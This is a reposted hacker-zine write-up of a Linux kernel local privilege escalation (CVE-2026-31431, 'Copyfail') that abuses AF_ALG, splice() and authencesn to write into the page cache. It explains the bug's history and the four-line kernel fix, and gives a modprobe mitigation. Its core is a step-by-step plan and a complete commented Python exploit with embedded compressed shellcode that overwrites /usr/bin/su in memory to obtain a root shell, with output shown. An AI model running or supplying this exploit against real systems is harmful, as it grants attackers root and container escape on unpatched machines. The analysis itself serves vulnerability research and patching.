732-Bytes to Pwn Linux Kernel
This is a zine repost.
https://ghspace.fr/zine/old/732_bytes_to_pwn_linux_kernel.txt
|=-----------------------------------------------------------------------=|
|=----------------=[ 732-bytes to pwn linux kernel ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ Beemo ]=--------------------------------=|
|=-----------------------------------------------------------------------=|
--[ Table of Contents
0x01 - Intro
0x02 - Dramatis Personae - subsystems
0x03 - The bug nobody saw for 9 years
0x04 - authencesn, ya cheating little bastard
0x05 - From 1000 to 0
0x06 - Proof of concept
0x07 - Howtf nobody noticed
0x08 - The fix (4 lines)
0x09 - Thoughts on copyfail
0x0a - References
--[ 0x01 - Intro
"Every so often, a bug comes along that makes you question whether
anyone ever reads the code they're committing to."
Every kernel LPE starts the same way. Here's another race
condition. Here's the window. Here's the heap spray. Here's the
KASLR leak. Here's the stack pivot and yadayadayda.
Good luck making it work twice.
Copyfail (CVE-2026-31431) - recently found by Taeyang Lee with a
little help from AI - doesn't do any of that.
No race. No heap spray. No KASLR bypass. No ROP chain. No compiled
binary. Just a logic flaw sitting in plain sight since 2017,
weaponizable in 732 bytes of Python, yielding a juicy root shell
on every major distro shipped in the last nine years.
You don't even need to be fast. Just a loop, four bytes
at a time, from a Python script.
So, how does it work ?.
--[ 0x02 - Dramatis Personae - subsystems
Three kernel subsystems walk into a bar. They've never met.
Each one is fine alone, together they give any local user a write4
primitive into the page cache of any readable file O_o
[*] AF_ALG
AF_ALG (address family 38) is a socket type that exposes the
kernel's crypto subsystem to userspace without caps needed.
Any user can open one, bind to any registered alg template,
and run encrypt/decrypt operations. It exists so userspace
can offload crypto to hw accelerators without needing a
kernel module per application.
In practice, almost nobody uses it. OpenSSL's afalg engine is
off by default but most distros compile it in anyway.
>>> a = socket.socket(38, 5, 0) # AF_ALG, SOCK_SEQPACKET
>>> a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
[*] splice()
splice() moves data between fds and pipes without copying. when
you splice FROM a file, the pipe doesn't get a copy of the data.
It gets a reference to the page cache page. The actual physical
page.
>>> splice(file_fd -> pipe) # pipe now holds page cache ref
>>> splice(pipe -> alg_fd) # alg socket now holds page cac
When you then splice from the pipe into another fd
(like our AF_ALG socket), those page cache references travel into
the crypto subsystem's scatterlist.
The latter now contains direct pointers to the physical
pages that back every read(), mmap(), and execve() of that file
on the entire system.
[*] authencesn
authencesn is an AEAD wrapper. It exists for IPsec Extended
Sequence Numbers (RFC 4303), where 64-bit sequence numbers are
split across the AAD.
The wrapper has to rearrange bytes for HMAC computation.
To do it, it uses the caller's output buffer as a scratch space,
writing 4 bytes past the end of the legitimate output area.
--[ 0x03 - The bug nobody saw for 9 years
In the old code (pre-2017), src and dst were separate. Page
cache pages were in src (read side). The output went to dst
(user buffer). Safe.
In 2017, commit 72548b093ee3 added an optimization to algif_aead.c:
perform AEAD operations in-place.
For decryption, the code now:
- Copies AAD and ciphertext from the TX scatterlist (which may
contain page cache pages from splice) into the RX buffer
(the user's recvmsg buffer).
- Does NOT copy the authentication tag. Instead, it chains the
tag pages from the TX scatterlist onto the end of the RX
scatterlist using sg_chain().
- Sets : req->src = req->dst
(both point to the same combined scatterlist).
req->src ----+
|
v
req->dst --> [ AAD || CT ] --> [ Tag (page cache pages) ]
^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^
\ RX buffer \ chained from TX SGL -+
(user mem) (file's page cache)
The output scatterlist now has a writable zone (the RX buffer)
followed immediately by page cache pages of whatever file was
spliced in. Nothing enforces the boundary between them. Nothing
documents this as a constraint. It's a silent invariant that every
AEAD algorithm is expected to honor.
Every AEAD algorithm indeed..Except one.
--[ 0x04 - authencesn, ya cheating little bastard
authencesn handles IPsec Extended Sequence Numbers. 64-bit
seqno split into hi (bytes 0-3) and lo (bytes 4-7) of the AAD.
During decrypt, it needs to rearrange these bytes for the HMAC.
Instead of allocating a scratch buffer it uses the caller's
destination scatterlist as a notepad:
crypto_authenc_esn_decrypt() ->
>>> // read first 8 bytes of AAD (seqno_hi || seqno_lo)
>>> scatterwalk_map_and_copy(tmp, dst, 0, 8, 0);
>>>
>>> // write seqno_hi at dst[4..7] (within AAD, fine)
>>> scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
>>>
>>> // write seqno_lo at dst[assoclen + cryptlen] (PAST THE END)
>>> scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);
^^^^^^^^^^^^^^^^^^^^
\ bug here!
That third write goes 4 bytes past the legitimate output boundary.
scatterwalk_map_and_copy() faithfully walks the scatterlist, hits
the sg_chain boundary, maps the page cache page via
kmap_local_page(), and writes 4 bytes of payload data directly
into the kernel's cached copy of target file.
The HMAC check runs, fails (the ciphertext is garbage - don't
care), recvmsg() returns -EBADMSG. Nobody checks the page cache.
The corrupted page is never marked dirty. The file on disk is
unchanged. But every subsequent read of that file, from any process,
from any container, sees the corrupted version.
--[ 0x05 - From 1000 to 0
The full sequence:
1. Open socket(AF_ALG), bind to authencesn(hmac(sha256),cbc(aes)).
Set a key. Accept a request socket.
2. Open /usr/bin/su (or any setuid binary) for reading.
3. For each 4-byte chunk of your shellcode:
a. sendmsg(AAD[8 bytes], cmsg=[DECRYPT, IV, ASSOCLEN=8], MSG_MORE)
Where bytes[4:8] = the 4 bytes to write.
Set assoclen, IV, etc. via cmsg headers.
b. splice() from /usr/bin/su into a pipe, then from the pipe
into the AF_ALG socket.
splice(target_fd -> pipe, offset=target_page_offset, len=32)
splice(pipe -> op_fd, len=32)
Choose offset so that the tag region aligns with your target
offset in su's .text section.
c. recv(op_fd)
^^^^^^^^^^
\ -EBADMSG, but scratch write already fired
Triggers the decrypt. authencesn writes your 4
bytes into the page cache. HMAC fails. recv() returns
error. The page cache is corrupted. Move to next chunk.
4. execve("/usr/bin/su"). The kernel loads su from the page
cache. Your shellcode is in .text. su is setuid root.
Congrats, you now root :D
Every process reading that file through the page cache sees the
corruption. execve() loads from page cache. getpwnam() reads
from page cache but the on-disk file is untouched. fsck is clean,
tripwire is clean, AIDE is clean, because nothing was written to disk.
No races to win. No timing windows. No kernel version checks. No
arch-specific gadgets. The same script works on:
Ubuntu 24.04 (6.17.0-1007-aws)
Amazon Linux (6.18.8-9.213.amzn2023)
RHEL 10.1 (6.12.0-124.45.1.el10_1)
SUSE 16 (6.12.0-160000.9-default)
..and every other distro that ships the default kernel config with
AF_ALG enabled.
--[ 0x06 - Proof of concept
The full exploit is 732 bytes minified, but i'll add some
comments for context. You can find the original one here:
https://github.com/theori-io/copy-fail-CVE-2026-31431
--8<-- cut here ---------------------------------------------------[[ BEGIN
#!/usr/bin/env python3
import os as g, zlib, socket as s
def d(x): return bytes.fromhex(x) # htob
def c(f, t, c):
# f = fd of target file (/usr/bin/su)
# t = offset within file to write at
# c = 4 bytes to write (shellcode chunk)
# Open AF_ALG socket, bind authencesn
# socket(family=AF_ALG, type=SOCK_SEQPACKET, proto=0)
# https://docs.python.org/3/library/socket.html#socket.socket
a = s.socket(38, 5, 0)
a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
h = 279 # SOL_ALG
# Set key: 8 bytes key header + 32 bytes AES-256 key
v = a.setsockopt
v(h, 1, d('0800010000000010' + '0'*64))
# Set AAD len = 0 (no additional assoclen opt)
v(h, 5, None, 4)
# Accept request fd
u, _ = a.accept()
o = t + 4 # offset adjustment
# sendmsg()
# (AAD = b"A"*4 + seqno_lo)
# (SOL_ALG, ALG_SET_OP) = decrypt (0x00 * 4)
# (SOL_ALG, ALG_SET_IV) = 16 null bytes
# (SOL_ALG, ALG_SET_AEAD_ASSOCLEN) = 8
i = d('00')
u.sendmsg(
[b"A"*4 + c], # AAD with payload in seqno_lo
[
(h, 3, i*4), # ALG_SET_OP = decrypt
(h, 2, b'\x10' + i*19), # ALG_SET_IV = 16 zero bytes
(h, 4, b'\x08' + i*3), # AEAD_ASSOCLEN = 8
],
32768 # MSG_MORE
)
# splice target file pages into AF_ALG socket
r, w = g.pipe()
n = g.splice
n(f, w, o, offset_src=0) # file -> pipe (page cache refs!)
n(r, u.fileno(), o) # pipe -> AF_ALG socket
# trigger decrypt (authencesn writes seqno_lo into page cache)
try:
u.recv(8 + t)
except:
pass # EBADMSG expected
f = g.open("/usr/bin/su", 0) # O_RDONLY
i = 0
# Decompress shellcode (execve("/bin/sh") or similar)
e = zlib.decompress(d(
"78daab77f57163626464800126063b0610af82c101cc7760c004"
"0e0c160c301d209a154d16999e07e5c1680601086578c0f0ff86"
"4c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa4999"
"79fac5190c0c0c0032c310d3"
))
# Write shellcode 4 bytes at a time into su's page cache
while i < len(e):
c(f, i, e[i:i+4])
i += 4
# Execute the corrupted setuid binary
g.system("su")
# Dang, you root :D
--8<-- cut here -----------------------------------------------------[[ EOS
Usage:
$ python3 copy_fail_exp.py
$ id
uid=0(root) gid=1002(user) groups=1002(user)
That's it. 732 bytes. Every distro. Every time.
--[ 0x07 - Howtf nobody noticed
Well...the bug exists because of 3 independently reasonable
changes by three different developers across six years:
2011: authencesn added to support IPsec ESN (a5079d084f8b).
The scratch write at dst[assoclen+cryptlen] is harmless -
the only caller is the in-kernel xfrm layer, and src/dst
are separate scatterlists. Nobody outside the kernel ever
touches this code.
2015: AF_ALG gains AEAD support (algif_aead.c). splice() can
now deliver page cache pages into the crypto scatterlist.
authencesn is converted to the new AEAD API (104880a6b470).
But AF_ALG uses out-of-place: req->src != req->dst. Page
cache pages are in src (read-only). The scratch write goes
to dst. Still not exploitable as is.
2017: In-place optimization (72548b093ee3). req->src = req->dst.
Page cache tag pages are chained into the writable
destination via sg_chain(). authencesn's scratch write now
crosses from the RX buffer into page cache pages.
The corruption is silent - no crash, no kernel log, no visible
side effect except the page cache being wrong. It doesn't trigger any
existing kernel self check. No KASAN or UBSAN. No lockdep. No page flags.
The kernel doesn't know the page is corrupted because the write
went through a legitimate code path (scatterwalk_map_and_copy) on a page
that was legitimately mapped.
--[ 0x08 - The fix (4 lines)
Commit a664bf3d603d reverts algif_aead.c to out-of-place operation:
diff --git a/before b/after
index aff63c7..9ca2c95 100644
--- a/before
+++ b/after
@@ -1,5 +1,5 @@
aead_request_set_crypt(
&areq->cra_u.aead_req,
-rsgl_src, // RX SGL (same as dst)
-areq->first_rsgl.sgl.sgt.sgl, // RX SGL
+tsgl_src, // TX SGL (src)
+areq->first_rsgl.sgl.sgt.sgl, // RX SGL (dst, separate)
used, ctx->iv);
The commit message: "There is no benefit in operating in-place in
algif_aead since the source and destination come from different
mappings."
You can temporarely mitigate if you're not able to patch it yet:
$ echo "install algif_aead /bin/false" \
> /etc/modprobe.d/disable-algif-aead.conf
$ rmmod algif_aead 2>/dev/null
This kills the AF_ALG AEAD socket type. You'll break apps, yes,
but only those who explicitly bind aead sockets via AF_ALG which in
practice is almost none.
--[ 0x09 - Thoughts on copyfail
Copyfail might be the cleanest kernel LPE in recent history.
It doesn't need race. It don't need spray. Definitely no leaks.
It doesn't even need a compiled binary. A 732-byte Python script,
using only stdlib modules, gets you root on every major Linux
distribution shipped since 2017. The same script crosses container
boundaries because the page cache is host-wide.
--[ 0x0a - References
[1] CVE-2026-31431 disclosure
https://copy.fail/
[2] Xint Code write-up
https://xint.io/blog/copy-fail-linux-distributions
[3] PoC source
https://github.com/theori-io/copy-fail-CVE-2026-31431
[4] Kernel fix (a664bf3d603d)
https://github.com/torvalds/linux/commit/a664bf3d603d
[5] In-place optimization commit (72548b093ee3)
https://github.com/torvalds/linux/commit/72548b093ee3
[6] authencesn original commit (a5079d084f8b)
https://github.com/torvalds/linux/commit/a5079d084f8b
|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|
| _ === B____ _e_ .
- - ( `\( ) | __ |e__| -_|___m_ __o |
| `> /~\ _* | __ -| -_|___| | . | - -
(_/ /\/ |_____|___| |_|_|_|___| |
* \ \ nflatrea@mailo.com
`./ https://nflatrea.bearblog.dev *
- Made with <3 ... .
|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|
--[ EOF